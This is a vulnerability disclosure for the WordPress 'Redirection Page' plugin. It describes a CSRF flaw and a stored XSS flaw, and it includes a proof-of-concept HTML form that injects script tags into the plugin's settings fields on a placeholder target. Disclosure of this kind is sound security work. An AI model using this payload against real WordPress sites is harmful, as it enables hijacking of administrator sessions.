Title: WordPress 'Redirection Page' CSRF/XSS
Version: 1.2
Author: Morten Nørtoft, Kenneth Jepsen, Mikkel Vej
Date: 2015-01-26
Download: https://wordpress.org/plugins/redirection-page/
Contacted WordPress: 2015-01-26
==========================================================

## Plugin description: 
==========================================================
Redirect your specified pages, it is usefull when you have 404/not-found pages. Go to Settings Page to start redirection. 

## CSRF:
==========================================================
It is possible to change the plugins redirect settings by tricking a logged in admin to visit a crafted page. 


## Stored XSS:
==========================================================
Redirect settings from the admin page is stored and shown unsanitized on the plugin's admin page. This allows an attacker to perform XSS through the settings fields. 

PoC:
Log in as admin and submit this form: 
<form method="POST" action="http://[TARGET]/wp-admin/options-general.php?page=redirection-page&redirectionpage_action=add"> 
 	<input type="text" name="source" value="&quot;><script>alert(1);</script>"><br />
	<input type="text" name="redir" value="&quot;><script>alert(2);</script>"><br />
	<input type="submit">
</form>


## Solution
==========================================================
No fix available.